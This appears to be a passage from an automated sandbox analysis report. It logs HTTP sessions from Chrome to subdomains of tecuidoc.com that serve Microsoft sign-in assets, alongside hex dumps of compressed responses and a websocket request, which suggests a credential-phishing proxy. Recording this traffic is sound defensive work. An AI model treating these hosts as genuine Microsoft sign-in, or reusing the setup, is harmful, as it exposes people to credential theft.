                                              2024-04-26 14:56:48 UTC16384INData Raw: eb 66 c0 bf b5 c7 75 59 71 7e bc 33 d4 e5 26 ae f4 dc 93 6c 01 11 cd d2 29 37 17 eb 50 4f e7 a6 8e 7f 59 09 7b 59 56 c2 5e be f1 b2 f0 9d cb d1 2e bd b5 e1 2e 53 f1 2e 55 e1 2e 53 3b dc 65 5a 0d 77 99 ae 0e 77 59 84 1f 80 58 50 21 ae 8a 30 ad c4 b8 4c 75 8c cb 22 4c 55 8c cb 42 c5 b8 2c c2 c2 8c 71 99 85 05 13 a8 cc c8 47 8d 21 f8 30 85 23 30 46 cb 6c 6b 6b 33 1b 7c 1c 6e 6d 5d 03 3b 4f 66 e3 6e 26 a4 fb 34 24 c2 27 d4 88 8b f9 86 8c d2 64 98 8f cb 78 3a 43 e8 a9 a9 4b b6 ae af 3c 1f fe bf 15 47 59 f0 4a c8 d6 02 a3 12 19 11 c8 0e 47 5d 8b 99 58 03 40 5e 71 e6 c5 db e2 98 ec 8b 26 08 a4 19 4a 43 3f 46 8e 7b 06 54 dd 52 00 f0 e7 88 f7 ea 8f fc 89 52 4a 86 a5 ef 46 ca ab 1f 15 c1 35 53 78 5b 92 c8 e1 06 b5 1c 84 e8 61 fd 46 88 c3 75 ec c2 aa c4 c4 18 8e 7b
                                              Data Ascii: fuYq~3&l)7POY{YV^..S.U.S;eZwwYXP!0Lu"LUB,qG!0#0Flkk3|nm];Ofn&4$'dx:CK<GYJG]X@^q&JC?F{TRRJF5Sx[aFu{
                                              2024-04-26 14:56:48 UTC7943INData Raw: e9 25 fa 23 09 ea 0e 91 64 72 05 5b 41 63 99 f0 46 41 89 09 ee 25 df f1 a4 dc 25 6b e3 ef 0e 6f 0d 21 8e 11 32 21 aa 46 72 6e 29 ef 01 e0 9c 2e 12 91 00 2b 5d c2 3c 68 5b 6b 16 5f 64 f3 f3 29 e2 60 90 0d c6 52 1b 07 6d 76 b1 5b 15 c1 4a e5 ae 47 b3 31 7d 50 09 6d 86 f3 83 28 b3 71 ce 85 1c 83 b4 e5 3a 15 f7 78 cf fa 18 52 92 fa 57 93 87 70 8d d6 55 7a cf 5a 65 99 8d 65 bd 85 c6 bd ba 22 8e 6d 85 20 a0 d3 bc 77 f7 90 60 8d 0e 2e 1f 36 94 14 f8 c0 24 7c d1 33 71 af 0e 3c a3 fc 1b b4 f0 ea 1d 30 58 8d 46 38 d4 7a 7d 4f ca 36 e6 de c0 f8 cb 19 02 f9 10 e4 43 49 02 5c 59 ef 0a 36 da 1c 22 da 0c 6b f3 d8 70 29 8a 0f 57 81 9c 4d 4c 28 34 e4 c8 c2 12 38 f2 8c 7c 08 cc 93 07 f9 f0 8c 76 cb 62 b1 8b 57 4d 8a 1b c6 eb 65 c0 cc ae 9c 09 6e d5 86 ba 0f 1d 3f c7 1e e6
                                              Data Ascii: %#dr[AcFA%%ko!2!Frn).+]<h[k_d)`Rmv[JG1}Pm(q:xRWpUzZee"m w`.6$|3q<0XF8z}O6CI\Y6"kp)WML(48|vbWMen?


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              17192.168.2.649733198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:56:44 UTC837OUTGET /Prefetch/Prefetch.aspx HTTP/1.1
                                              Host: 0a413710-7d4f53f3.tecuidoc.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              sec-ch-ua-platform: "Windows"
                                              Upgrade-Insecure-Requests: 1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Sec-Fetch-Site: same-site
                                              Sec-Fetch-Mode: navigate
                                              Sec-Fetch-Dest: iframe
                                              Referer: https://srmcorp.tecuidoc.com/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
                                              2024-04-26 14:56:47 UTC430INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:56:47 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              cache-control: no-store, no-cache
                                              x-ua-compatible: IE=Edge
                                              x-cache: CONFIG_NOCACHE
                                              x-msedge-ref: Ref A: BBB2A2C56ED740F186DFDB0138F0E4E0 Ref B: DFW311000106025 Ref C: 2024-04-26T14:56:46Z
                                              access-control-allow-origin: *
                                              access-control-allow-headers: *
                                              2024-04-26 14:56:47 UTC1252INData Raw: 34 64 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20
                                              Data Ascii: 4dd<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404
                                              2024-04-26 14:56:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              18192.168.2.649734198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:56:48 UTC788OUTGET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1
                                              Host: 7e55e394-7d4f53f3.tecuidoc.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-site
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://srmcorp.tecuidoc.com/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
                                              2024-04-26 14:56:50 UTC806INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:56:50 GMT
                                              Content-Type: image/svg+xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              cache-control: public, max-age=31536000
                                              last-modified: Wed, 24 May 2023 10:11:46 GMT
                                              etag: 0x8DB5C3F47E260FD
                                              x-ms-request-id: 9e15a6a2-701e-003d-34be-921b94000000
                                              x-ms-version: 2009-09-19
                                              x-ms-lease-status: unlocked
                                              x-ms-blob-type: BlockBlob
                                              access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              access-control-allow-origin: *
                                              x-azure-ref: 20240426T145650Z-186b7b7b98djsjjgyy4cf1dpk4000000064000000000nzy1
                                              x-fd-int-roxy-purgeid: 4554691
                                              x-cache: TCP_HIT
                                              accept-ranges: bytes
                                              content-encoding: gzip
                                              2024-04-26 14:56:50 UTC680INData Raw: 32 61 31 0d 0a 1f 8b 08 00 00 00 00 00 00 ff b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01
                                              Data Ascii: 2a1Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq*~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1*#vGal9
                                              2024-04-26 14:56:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              19192.168.2.649735198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:56:48 UTC789OUTGET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1
                                              Host: 7e55e394-7d4f53f3.tecuidoc.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-site
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://srmcorp.tecuidoc.com/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
                                              2024-04-26 14:56:51 UTC806INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:56:51 GMT
                                              Content-Type: image/svg+xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              cache-control: public, max-age=31536000
                                              last-modified: Wed, 24 May 2023 10:11:48 GMT
                                              etag: 0x8DB5C3F4911527F
                                              x-ms-request-id: 193a5faa-701e-002d-51b4-97abb6000000
                                              x-ms-version: 2009-09-19
                                              x-ms-lease-status: unlocked
                                              x-ms-blob-type: BlockBlob
                                              access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              access-control-allow-origin: *
                                              x-azure-ref: 20240426T145650Z-15d7758b5dbq76z6p9vuvmntpg00000000kg000000007u1v
                                              x-fd-int-roxy-purgeid: 4554691
                                              x-cache: TCP_HIT
                                              accept-ranges: bytes
                                              content-encoding: gzip
                                              2024-04-26 14:56:51 UTC1442INData Raw: 35 39 62 0d 0a 1f 8b 08 00 00 00 00 00 00 ff bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12
                                              Data Ascii: 59bWMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#
                                              2024-04-26 14:56:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              20192.168.2.649736198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:56:48 UTC750OUTGET /shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_eb638da25d4055fbbb57.js HTTP/1.1
                                              Host: 7e55e394-7d4f53f3.tecuidoc.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Sec-Fetch-Site: same-site
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: script
                                              Referer: https://srmcorp.tecuidoc.com/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
                                              2024-04-26 14:56:51 UTC806INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:56:51 GMT
                                              Content-Type: application/x-javascript
                                              Content-Length: 35841
                                              Connection: close
                                              cache-control: public, max-age=31536000
                                              last-modified: Thu, 15 Feb 2024 19:13:16 GMT
                                              etag: 0x8DC2E5A29EDB0A1
                                              x-ms-request-id: 010d7f19-f01e-0019-2aae-9626af000000
                                              x-ms-version: 2009-09-19
                                              x-ms-lease-status: unlocked
                                              x-ms-blob-type: BlockBlob
                                              access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              access-control-allow-origin: *
                                              x-azure-ref: 20240426T145650Z-178cffcc9b58n7rzy6zm1n5txw00000002qg000000001ce5
                                              x-fd-int-roxy-purgeid: 0
                                              x-cache: TCP_HIT
                                              accept-ranges: bytes
                                              content-encoding: gzip
                                              2024-04-26 14:56:51 UTC15578INData Raw: 1f 8b 08 00 00 00 00 00 00 03 e4 bd 7b 7f db 38 92 28 fa ff f9 14 b6 a6 c7 11 db b4 2c ea 2d db 8c c7 f1 a3 93 99 a4 93 cd a3 67 67 6c 75 86 a2 20 89 6d 8a 94 49 ca 8f c4 de cf 7e ab 0a 6f 52 76 92 d9 b3 e7 dc df bd 99 69 9a 28 14 0a 85 02 50 28 14 0a d4 ee cf 9b ff 6b e3 e7 8d 9d ef ff b7 f1 e1 e3 d1 fb 8f 1b 6f cf 36 3e be 7c f5 fe 64 e3 1d a4 fe b1 f1 eb db 8f af 8e 4f bf 9f 0e 56 8a ff 7d 9c 47 f9 c6 34 8a d9 06 fc 1d 07 39 9b 6c a4 c9 46 9a 6d 44 49 98 66 cb 34 0b 0a 96 6f 2c e0 99 45 41 bc 31 cd d2 c5 46 31 67 1b cb 2c fd 83 85 45 be 11 47 79 01 85 c6 2c 4e 6f 36 ea 40 2e 9b 6c bc 0b b2 e2 6e e3 d5 3b a7 01 f4 19 50 8b 66 51 02 a5 c3 74 79 07 ef f3 62 23 49 8b 28 64 1b 41 32 21 6a 31 24 92 9c 6d ac 92 09 cb 36 6e e6 51 38 df 78 13 85 59 9a a7 d3 62
                                              Data Ascii: {8(,-gglu mI~oRvi(P(ko6>|dOV}G49lFmDIf4o,EA1F1g,EGy,No6@.ln;PfQtyb#I(dA2!j1$m6nQ8xYb
                                              2024-04-26 14:56:51 UTC16384INData Raw: 4c 92 3e 35 93 59 5f b6 f7 7a 02 96 d8 80 5b b9 cc 92 85 fd a1 bc e3 24 a4 12 90 9c 7a 79 e5 23 8a 78 b1 42 74 45 8f 8c aa 0f 2f cd 5f bf 22 9e e6 e6 ef 5f 0d 09 47 63 0c 38 86 ca a7 41 89 87 ce 6b 3f c9 4e 39 6b af 6b 97 4f af db 12 b6 ce 79 4a 64 d6 1b 3e 94 65 7f db 9d 6e 22 e6 73 f1 3b 3f 38 00 3f 44 33 f5 c5 47 b2 6f 72 03 10 2a c0 54 42 5a 12 72 6d 43 f4 e9 1b 4f 1a 01 d9 01 87 a8 23 f5 b6 48 5f 95 00 ea 33 d4 4c a4 e5 44 a0 1d a1 f9 9d b9 89 48 ab 0b 96 53 0e 50 a1 d6 74 fc 01 00 73 49 e8 70 90 f9 45 38 62 bd fc f9 07 fa ee 2a ff 39 2e 39 d4 a8 67 11 bc 76 50 2e 82 7c 2e e7 30 6d 6e f3 85 fd 25 65 aa b9 dc a1 8b 48 d2 6f 0b 80 fa 88 43 c0 93 ca 05 16 8a b4 0a e4 0a d5 cd 9d 0f 6f cf 3e ea 11 48 88 e9 b4 d0 63 90 43 62 c3 db 3f 15 10 a9 b7 3b 3c 0d
                                              Data Ascii: L>5Y_z[$zy#xBtE/_"_Gc8Ak?N9kkOyJd>en"s;?8?D3Gor*TBZrmCO#H_3LDHSPtsIpE8b*9.9gvP.|.0mn%eHoCo>HcCb?;<
                                              2024-04-26 14:56:51 UTC3879INData Raw: 91 4f 8a 87 71 08 dd ff 3a f6 d7 77 93 06 46 42 66 4c 17 cd cb 3d 86 54 93 33 e4 69 3e 41 20 99 a1 3a 91 6e 8f 2f 05 1f ca 6d 37 f1 54 fb 64 33 57 21 db 53 92 9a d6 e6 56 5f cc cc b0 a0 a3 cd 13 45 b4 ef b2 20 ad 33 4a 9a e2 a2 2a 97 2b 7d 66 c5 f8 96 33 d6 94 d1 79 70 64 d4 79 07 c6 18 d6 fa a7 2c 03 2e ec b5 85 fb 57 b4 78 f8 bc b5 8f 3e 27 44 4f 8e 72 38 7d ac fd a3 c6 6b 27 74 5e 37 7a 47 af 9d 2d e2 f2 74 1a 30 5c 06 c4 c5 e3 85 be bf e3 57 56 0c 57 50 3d 4b 20 b4 4d b5 9c dc f3 00 72 e7 c7 a4 db c6 e8 96 a2 6b f8 c5 45 d8 d0 d3 9e d9 7e eb 1d 41 47 80 89 2b 77 7a d6 27 be cf 67 52 de 57 b5 ba 92 25 18 3c 15 67 00 a4 4a b4 6e 8f 52 e3 2d 91 cf 9e 4a ee ed 2c a4 b8 3d ed 63 8d 8d 97 82 83 a2 ce 5b a1 7e a6 1d aa ca 74 33 2c 51 4b bd 3f ee 6d 1a cd 2d
                                              Data Ascii: Oq:wFBfL=T3i>A :n/m7Td3W!SV_E 3J*+}f3ypdy,.Wx>'DOr8}k't^7zG-t0\WVWP=K MrkE~AG+wz'gRW%<gJnR-J,=c[~t3,QK?m-


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              21192.168.2.649737198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:56:49 UTC775OUTGET /shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1
                                              Host: 7e55e394-7d4f53f3.tecuidoc.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-site
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://srmcorp.tecuidoc.com/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
                                              2024-04-26 14:56:51 UTC764INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:56:51 GMT
                                              Content-Type: image/x-icon
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              cache-control: public, max-age=31536000
                                              last-modified: Sun, 18 Oct 2020 03:02:03 GMT
                                              etag: 0x8D8731230C851A6
                                              x-ms-request-id: c4df88c8-801e-003a-3e7b-91ca9a000000
                                              x-ms-version: 2009-09-19
                                              x-ms-lease-status: unlocked
                                              x-ms-blob-type: BlockBlob
                                              access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              access-control-allow-origin: *
                                              x-azure-ref: 20240426T145651Z-186b7b7b98dzrlvc3mahdvp8h00000000ccg00000000qgfp
                                              x-fd-int-roxy-purgeid: 4554691
                                              x-cache: TCP_HIT
                                              accept-ranges: bytes
                                              2024-04-26 14:56:51 UTC2286INData Raw: 38 65 37 0d 0a 00 00 01 00 06 00 10 10 00 00 00 00 20 00 16 01 00 00 66 00 00 00 18 18 00 00 00 00 20 00 24 01 00 00 7c 01 00 00 20 20 00 00 00 00 20 00 35 01 00 00 a0 02 00 00 30 30 00 00 00 00 20 00 6a 01 00 00 d5 03 00 00 40 40 00 00 00 00 20 00 f3 01 00 00 3f 05 00 00 80 80 00 00 00 00 20 00 b5 01 00 00 32 07 00 00 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 10 08 06 00 00 00 1f f3 ff 61 00 00 00 dd 49 44 41 54 78 9c dd 92 31 4e 43 41 10 43 df cc 8e 44 40 b0 22 2d 65 6e c4 21 90 68 c3 15 38 40 ce c4 39 68 a8 11 22 e4 ff 00 05 93 35 4d 1a b2 bf 89 68 10 2e 2d 8d c7 b6 6c 9b eb 85 4c fc 80 50 d6 59 09 5e 6c 75 77 ff c8 95 d9 72 dc 28 cd 08 0e e0 87 c7 c7 c2 7f 77 fe 17 04 42 28 7b da 12 04 f2 26 01 46 02 a9 89 be a2 ce 4e ba 66
                                              Data Ascii: 8e7 f $| 500 j@@ ? 2PNGIHDRaIDATx1NCACD@"-en!h8@9h"5Mh.-lLPY^luwr(wB({&FNf
                                              2024-04-26 14:56:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              22192.168.2.649738198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:56:49 UTC789OUTGET /shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg HTTP/1.1
                                              Host: 7e55e394-7d4f53f3.tecuidoc.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-site
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://srmcorp.tecuidoc.com/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
                                              2024-04-26 14:56:51 UTC806INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:56:51 GMT
                                              Content-Type: image/svg+xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              cache-control: public, max-age=31536000
                                              last-modified: Wed, 24 May 2023 10:11:49 GMT
                                              etag: 0x8DB5C3F49ED96E0
                                              x-ms-request-id: d448c2c9-901e-001f-79b3-97dca3000000
                                              x-ms-version: 2009-09-19
                                              x-ms-lease-status: unlocked
                                              x-ms-blob-type: BlockBlob
                                              access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              access-control-allow-origin: *
                                              x-azure-ref: 20240426T145651Z-15d7758b5dbq76z6p9vuvmntpg00000000hg000000009htb
                                              x-fd-int-roxy-purgeid: 4554691
                                              x-cache: TCP_HIT
                                              accept-ranges: bytes
                                              content-encoding: gzip
                                              2024-04-26 14:56:51 UTC628INData Raw: 32 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 ff 7d 55 4d 6f 22 31 0c fd 2b a3 d9 ab 93 c9 f7 47 3b 20 cd 9e 38 6c af 1c b8 4d 0b 05 24 0a 55 19 41 57 ab fe f7 b5 93 a0 55 61 58 0d d8 60 27 ef 3d db 09 b4 c7 d3 ba fa 7c db ed 8f 93 7a 33 0c ef 0f 4d 73 3e 9f f9 59 f3 c3 c7 ba 51 42 88 06 57 d4 d5 79 bb 1c 36 93 da 84 ba da ac b6 eb cd 90 3f 9f b6 ab f3 cf c3 e7 a4 16 95 a8 4c c0 57 3d 6d 97 ab d7 e3 b4 3d 0e bf 77 ab 29 ef ff bc 6e 77 bb 87 fd 61 bf 7a fc e2 cf f9 db 0f 23 e8 79 fc 6a 9b bc ac 6d f2 a6 8f d5 cb 50 bd ec fa 23 ca e9 ef b1 36 d3 f6 bd 1f 36 97 75 cf 75 b5 9c d4 4f 46 80 56 dc fa 30 37 62 a6 d5 5c bb 99 0a 73 ad 66 ca cc 55 e0 de b9 4e 0a ee 42 84 e2 04 3e 12 64 04 2d 7a 0c a5 78 89 32 cb ad f1 4c 72 0b 52 72 29 dc c5 e5 ac e2 4a 46 cc 7a 19 3b
                                              Data Ascii: 26d}UMo"1+G; 8lM$UAWUaX`'=|z3Ms>YQBWy6?LW=m=w)nwaz#yjmP#66uuOFV07b\sfUNB>d-zx2LrRr)JFz;
                                              2024-04-26 14:56:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              23192.168.2.649740198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:56:51 UTC707OUTGET /7d4f53f33e0f490ca63a57a3f299e2af/ HTTP/1.1
                                              Host: srmcorp.tecuidoc.com
                                              Connection: Upgrade
                                              Pragma: no-cache
                                              Cache-Control: no-cache
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Upgrade: websocket
